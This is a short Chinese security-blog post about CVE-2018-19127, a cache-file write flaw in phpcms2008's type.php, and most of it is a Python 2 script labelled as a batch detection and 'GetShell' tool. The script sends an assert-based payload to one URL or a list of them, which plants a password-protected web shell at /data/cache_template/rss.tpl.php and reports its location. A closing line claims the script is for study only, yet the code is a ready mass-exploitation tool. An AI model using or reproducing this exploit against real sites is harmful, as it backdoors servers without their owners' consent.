释放双眼,带上耳机,听听看~!
概述: 近日phpcms2008版本被爆出可控的缓存文件写入任意内容漏洞,该漏洞由type.php产生原文连接:https://www.secfree.com/article-1113.html批量检测工具#!/usr/bin/envpython#-*-coding:utf-8
概述:
近日phpcms2008版本被爆出可控的缓存文件写入任意内容漏洞,该漏洞由type.php产生
原文连接:https://www.secfree.com/article-1113.html
批量检测工具
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# CVE ID: CVE-2018-19127
# GetShell Tools author: Bearcat
# Referer: http://www.secfree.com/article-1113.html
import requests
import re
import sys
def send_payload(target):
payload = "/type.php?template=tag_(){};@unlink(FILE);assert($_POST[secfree]);{//../rss"
targets = target + payload
header_list = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
}
try:
request = requests.get(target)
if request.status_code == 404:
print "[-] 404 not found " + target
else:
results = requests.get(targets,headers=header_list,timeout=3).text
# print results
c = re.findall(r"function.assert'>(.+?)</a>",results)
# print c
if len(c):
if c[0] == "function.assert":
print "[+] exists " + "[WebShell:" + target + "/data/cache_template/rss.tpl.php|secfree]"
else:
print "[-] don't exists " + target
except requests.ConnectionError:
print "[-] Cannot connect url " + target
def read_url_list(files):
for line in open(files):
send_payload(line[:-1])
if __name__ == '__main__':
print "\n[*] Start GetShell...\n"
if sys.argv[1] == "-u":
send_payload(sys.argv[2])
elif sys.argv[1] == "-f":
file = sys.argv[2]
read_url_list(file)仅供学习以及安全检测,请勿用作非法用途,如违反,指尖安全不承担任何责任!
